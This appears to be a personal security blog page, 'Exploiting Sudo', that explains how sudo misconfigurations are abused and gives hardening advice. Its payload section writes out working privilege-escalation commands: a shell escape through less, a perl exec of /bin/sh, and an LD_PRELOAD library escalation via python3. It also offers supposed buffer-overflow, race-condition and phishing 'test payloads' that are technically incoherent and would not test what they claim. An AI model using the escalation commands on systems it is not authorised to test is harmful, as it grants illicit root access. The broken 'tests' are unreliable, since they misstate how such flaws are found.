<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <meta name="description" content="Exploiting Sudo">
    <meta name="author" content="Samuel Kwaku Addison">

    <meta property="og:site_name" content="Samuel K. Addison - Website" />
    <meta property="og:title" content="Samuel K. Addison" />
    <meta property="og:description" content="Cyber Security Engineer" />
    <meta property="og:image" content="/images/smiles.png" />
    <meta property="og:type" content="website" />
    <meta property="og:url" content="https://samaddy.github.io/">

    <title>Exploiting Sudo | Samuel K. Addison - Cyber Security Engineer</title>

    <link href="https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,400;0,600;0,700;1,400&family=Poppins:wght@600&display=swap" rel="stylesheet">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css" rel="stylesheet">
    <link rel="stylesheet" href="https://kit.fontawesome.com/997d814be9.css" crossorigin="anonymous">
    <link href="https://getbootstrap.com/docs/5.2/assets/css/docs.css" rel="stylesheet">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.24.1/themes/prism-okaidia.min.css" rel="stylesheet" />
 

    <link href="css/style.css" rel="stylesheet">

    <link rel="icon" href="/images/favicon.png">

    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/js/bootstrap.bundle.min.js"></script>
    <script src="https://kit.fontawesome.com/997d814be9.js" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.8/clipboard.min.js"></script>
    

    <!-- <script>
        document.addEventListener('DOMContentLoaded', function() {
            const currentLocation = location.href;
            const navLinks = document.querySelectorAll('.nav-link');
            navLinks.forEach(link => {
            if (link.href === currentLocation) {
                link.classList.add('current');
            }
            });
        });
    </script> -->

    <!-- Google tag (gtag.js) -->
    <script async src="https://www.googletagmanager.com/gtag/js?id=G-10C9B08WGE"></script>
    <script>
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());
    
        gtag('config', 'G-10C9B08WGE');
    </script>

    <style>
        body {
            background: #130a3f;
            font-family: 'Open Sans', Helvetica, sans-serif;
            color: #7E7E7E;
        }

        h1 {
            color: #fff;
            font-weight: 900;
            font-size: 2.2rem;
            line-height: 3.25rem;
            font-family: 'inter', sans-serif;
            margin-top: 1.5rem;
            text-decoration: none;
            text-align: center;
        }

        .nav a:link {
            color: #fff;
        }

        .nav a:hover, a:active{
            color: #fff;
            text-decoration: underline;
            text-underline-offset: 3px;
        }

        .container-fluid a:hover {
            text-decoration: none;
        }

        .nav-link{
            color: #fff;
        }

        .active {
            text-decoration: underline;
            text-underline-offset: 3px;
        }
        
        .container-fluid h1 {
            margin-top: 2.0rem;
            font-family: "inter", sans-serif;
            font-size: 32px;
        }

        /* blog styling */
        .blog h2 {
            font-weight: 400;
            padding-top: 10px;
            padding-bottom: 10px;
            color: #08a0e9;
        }
        .content p {
            color: #ffff;
        }

        .copy-code {
            position: absolute;
        /*  top: 0; */
        /*  right: 0; */
            cursor: pointer;
        }


        /* socials and copyright */
        .socials-copyright {
            /* display: flex; */
            padding-top: 5rem;
            text-align: center;
            bottom: 0;
            right: 0;
            width: 100%;
        }

        .social-container a {
            text-decoration: none;
            color: #fff;
        }

        .social-container a:hover {
            text-decoration: none;
        }

        .fa-twitter {
            color: #08a0e9;
        }

        .fa-youtube {
            color: #FF0000;
        }

        .p-small {
            margin-top: 10px;
            color: #fff;
            font-size: 15px;
        }

        time {
            text-align: center;
        }

        ol li {
            font-weight: bolder;
            margin-top: 10px;

        }

        ol span {
            font-weight: normal;
        }
        
        article {
        position: relative;
        padding: 20px;
        z-index: 2;

        max-width:calc(100vw - 4rem);
        width:60rem;
        margin:0 auto
        }

        .caption {
            text-align: center;
        }

        .caption time {
            font-size: small;
        }

        .blog li {
            color: #fff;
        }

        .screenshot {
            text-align: center;
            padding-top: 10px;
            padding-bottom: 10px;
        }

        @media screen and (max-width: 780px) {
            article {
                max-width:100%;
                margin:0 auto
            }

            .contact-container {
                margin-left: 15px;
                margin-right: 15px;
            }

            .screenshot img {
                max-width: 100%;
            }

            .p-small {
                margin-top: 0px;
            } 
        }

    </style>
</head>
<body data-spy="scroll" data-target=".fixed-top">
    <section>
        <div class="container-fluid">
            <h1><a class="navbar-brand" href="https://samaddy.github.io/">Samuel K. Addison</a></h1>
        </div>
        <div class="container">
            <ul class="nav justify-content-center">
                <li class="nav-item">
                  <a class="nav-link" href="https://samaddy.github.io/">Home</a>
                </li>
                <li class="nav-item">
                  <a class="nav-link" href="https://samaddy.github.io/Projects/projects.html">Projects</a>
                </li>
                <li class="nav-item">
                  <a class="nav-link active" aria-current="page" href="https://samaddy.github.io/Blog/blog.html">Blog</a>
                </li>
                <li class="nav-item">
                    <a class="nav-link" href="https://samaddy.github.io/contact.html">Contact</a>
                  </li>
              </ul>
        </div>
    </section>

    <article class="blog">
        <div class="caption">
            <time datetime="2023-02-23">Thursday, February 23, 2023</time>
            <h1>Exploiting Sudo</h1>
        </div>
    
        <div class="content">
            <p>
                Exploiting the sudo command is a common tactic used by attackers to gain privileged access to a system. Sudo, which stands for "superuser do," 
                allows authorized users to execute commands as another user, typically as the root user. This feature can be incredibly powerful, but it can also be 
                dangerous if not used properly. In this blog post, we will discuss some of the ways sudo can be exploited and the best security practices to avoid 
                these types of attacks.
            </p>

            <h2>How Sudo Can Be Exploited</h2>
            
            <ol>
                <li>
                    Exploiting Misconfigured Sudoers File: 
                    <span>
                        One way attackers can exploit sudo is by exploiting a misconfigured sudoers file. The sudoers file is a configuration file that defines the rules for sudo access. 
                        If this file is not configured correctly, it can allow unauthorized users to gain access to the root user account.
                    </span>
                </li>
                
                <li>
                    Exploiting Sudo Vulnerabilities: 
                    <span>
                        Another way attackers can exploit sudo is by exploiting vulnerabilities in the sudo command itself. This can include buffer overflow vulnerabilities, race conditions, 
                        or other types of memory corruption vulnerabilities. These types of vulnerabilities can allow attackers to execute arbitrary code with root privileges.
                    </span>
                </li>
             
                <li>
                    Using Social Engineering Techniques: 
                    <span>
                        Attackers can also exploit sudo by using social engineering techniques to trick users into giving them sudo access. This can include phishing attacks, 
                        where attackers send emails or messages that appear to be from a trusted source, or impersonation attacks, where attackers pretend to be a system administrator 
                        or other trusted user.
                    </span>
                </li>
            </ol>
    
            <h2>Best Security Practices to Avoid Sudo Exploitation</h2>

            <ol>
                <li>
                    Limit Sudo Access: 
                    <span>
                        One of the best ways to avoid sudo exploitation is to limit sudo access to only the users who need it. This can be done by creating a separate 
                        user account for each user who needs sudo access and only giving them access to the specific commands they need.
                    </span>
                </li>
                <li>
                    Use the Principle of Least Privilege: 
                    <span>
                        The principle of least privilege is a security concept that states that users should only be given the minimum access 
                        necessary to perform their job functions. This means that sudo access should be limited to only the commands that are required for a particular user to perform their job.
                    </span>
                </li>
                <li>
                    Keep Sudoers File Secure
                    <span>
                        The sudoers file should be stored securely and only accessible to authorized users. It should also be reviewed regularly to ensure that 
                        it is configured correctly and that no unauthorized changes have been made.
                    </span>
                </li>
                <li>
                    Use Multi-Factor Authentication: 
                    <span>
                        Multi-factor authentication can be used to add an extra layer of security to sudo access. This can include using a combination 
                        of something the user knows, such as a password, and something the user has, such as a smart card or token.
                    </span>
                </li>
            </ol>

            <h2>Sample Payloads</h2>

            <p>
                It is important to test for sudo vulnerabilities to ensure that your system is secure. Here are some sample payloads that can be used for testing purposes:
            </p>

            <p>
                One may check out the commands that can be executed using sudo with the command
            </p>
            <pre><code class="language-bash" data-clipboard-text='sudo -l'>
                sudo -l
            </code></pre>

            <p>
                Sample result on using 
                <code>sudo -l </code> could look like the image below:
            </p>

            <figure class="screenshot">
                <img src="Images/sudo.png" alt="Screenshot of commands that use sudo">
                <figcaption>Figure 1 - sudo commands</figcaption>
            </figure>

            <p>
                From the screenshot in Figure 1, we could escalate our privilege using 
                <code>/usr/bin/python3</code>,
                <code>/usr/bin/perl</code>,  
                <code>/usr/bin/less</code>, and also use the env set
                <code>env_keep+=LD_PRELOAD</code>
            </p>

            <p>
                The payload that can be used to elevate privilege with command <code>less </code> is 
            </p>
            <pre><code class="language-bash">
                sudo less /etc/profile
                !/bin/sh
            </code></pre>

            <p>
                The payload for escalating privilege with command <code> perl </code> is 
            </p>
            <pre><code class="language-bash">
                perl -e 'exec "/bin/sh";'
            </code></pre>

            <p>
                In order to take advantage of the environment variable <code>LD_PRELOAD</code>, we will create some code that will assist in setting the gid and uid to 0. 
                Our file will be saved under the directory <code>/tmp</code> with the name style <code>filename.c</code> .
            </p>
            <figure class="screenshot">
                <img src="Images/escalation-code.png" alt="Code for escalating privilege">
                <figcaption>Figure 2 - Escalation code</figcaption>
            </figure>

            <p>
                We will then proceed to run the piece of code with the command:
            </p>
            <pre><code class="language-bash">
                gcc -fPIC -shared -o filename.so filename.c -nostartfiles
            </code></pre>

            <p>
                Once the changes is completed, we can escalate our privilege with basically any command that was found available when we executed
                <code>sudo -l</code>.
                In this case we will be escalating our privilege with <code>/usr/bin/python3</code>. The command used is 
            </p>
            <pre><code class="language-bash">
                sudo LD_PRELOAD=/tmp/filename.so /usr/bin/python3
            </code></pre>
            <figure class="screenshot">
                <img src="Images/python3.png" alt="Screenshot of python3 escalation">
                <figcaption>Figure 3 - Privilege escalation with python3</figcaption>
            </figure>

            <p>
                The buffer overflow payload can be used to test for buffer overflow vulnerabilities in the sudo command:
            </p>
            <pre><code class="language-bash">
                sudo -s $(perl -e 'print "A" x 10000')
            </code></pre>

            <p>
                The race condition payload can be used to test for race condition vulnerabilities in the sudo command:
            </p>
            <pre><code class="language-bash">
                sudo sh -c 'while true; do ln -sf /bin/sh /tmp/sh; done'
            </code></pre>

            <p>
                The phishing attack payload can be used to test for phishing attacks that attempt to trick users into giving them sudo access:
            </p>
            <pre><code class="language-bash">
                sudo echo "Password: $(zenity --password)"
            </code></pre>



            <h2>Conclusion</h2>
            
            <p>
                Sudo is a powerful command that can be used to perform tasks with administrative privileges. However, it can also be a security risk if not used properly. 
                By implementing best security practices, such as using strong passwords, limiting sudo access, keeping the sudoers file secure, implementing multi-factor authentication, 
                and monitoring sudo usage, you can reduce the risk of sudo exploitation and improve the overall security of your system.
            </p>

            <h2>References</h2>
            <div class="reference">
                <ul>
                    <li>
                        <a href="https://gtfobins.github.io/">https://gtfobins.github.io/</a>
                    </li>
                </ul>
            </div>

        </div>
    
    </article>

    <section class="socials-copyright">
        <div class="footer">
            <div class="container">
                <div class="row">
                    <div class="col-lg-12">
                        <div class="social-container">
                            <span class="fa-stack">
                                <a href="https://github.com/SamAddy">
                                    <i class="fab fa-github fa-stack-1x"></i>
                                </a>
                            </span>
                            <span class="fa-stack">
                                <a href="https://www.linkedin.com/in/samuel-k-addison/">
                                    <i class="fa-brands fa-linkedin-in fa-stack-1x"></i>
                                </a>
                            </span>
                            <span class="fa-stack">
                                <a href="https://twitter.com/Prof_Addy">
                                    <i class="fa-brands fa-twitter fa-stack-1x"></i>
                                </a>
                            </span>
                            <span class="fa-stack">
                                <a href="https://www.youtube.com/@profaddy">
                                    <i class="fa-brands fa-youtube fa-stack-1x"></i>
                                </a>
                            </span>
                        </div> 
                    </div> 
                </div> 
            </div> 
        </div> 


         <div class="copyright">
            <div class="container">
                <div class="row">
                    <div class="col-lg-12">
                        <p class="p-small">© <script>document.write(new Date().getFullYear())</script> - SamAddy</p>
                    </div> 
                </div> 
            </div> 
        </div> 
    </section>



    <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
    <script src="https://cdn.jsdelivr.net/npm/popper.js@1.14.7/dist/umd/popper.min.js" integrity="sha384-UO2eT0CpHqdSJQ6hJty5KVphtPhzWj9WO1clHTMGa3JDZwrnQq4sF86dIHNDz0W1" crossorigin="anonymous"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.3.1/dist/js/bootstrap.min.js" integrity="sha384-JjSmVgyd0p3pXB1rRibZUAYoIIy6OrQ6VrjIEaFf/nJGzIxFDsf4x0xIM+B07jRM" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.24.1/components/prism-core.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.24.1/plugins/autoloader/prism-autoloader.min.js"></script>
    <script>hljs.highlightAll();</script>
</body>
</html>